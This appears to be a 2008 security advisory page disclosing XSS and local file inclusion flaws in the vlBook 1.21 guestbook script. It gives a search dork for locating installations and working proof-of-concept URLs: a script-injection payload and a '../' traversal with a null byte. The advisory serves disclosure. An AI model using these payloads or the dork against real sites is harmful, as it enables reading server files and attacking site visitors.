Bug: vlBook 1.21 (ALL VERSION) ( Ascii Version )

Search:
WLB2

vlBook 1.21 (ALL VERSION)

Published
Credit
Risk
2008.05.06
IRCRASH
High
CWE
CVE
Local
Remote
N/A
CVE-2008-2072
CVE-2008-2073
No
Yes

----------------------------------------------------------------

Script : vlBook 1.21 (ALL VERSION)

Type : Multiple Remote Vulnerabilities (LFI/XSS)

----------------------------------------------------------------

Discovered by : IRCRASH (Dr.Crash Or Khashayar Fereidani)

----------------------------------------------------------------

Our Site : Http://IRCRASH.COM

----------------------------------------------------------------

IRCRASH Team Members : Dr.Crash Or Khashayar Fereidani - Hadi Kiamarsi - Malc0de - R3d.w0rm - Rasool Nasr

----------------------------------------------------------------

Script Download : http://home.vlab.info/vlbook_1.21.zip

----------------------------------------------------------------

DORK : "Powered by vlBook 1.21"

----------------------------------------------------------------

#XSS Address : http://example/?l=" <script>alert('xss')</script>

----------------------------------------------------------------

#LFI Address : http://example/include/global.inc.php?l=../../../[FILE NAME]%00

----------------------------------------------------------------

TNx : God......

----------------------------------------------------------------

See this note in TXT Version

Bugtraq RSS
Bugtraq
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn
 
CVE RSS
CVEMAP

Copyright 2014, cxsecurity.com
Ascii Version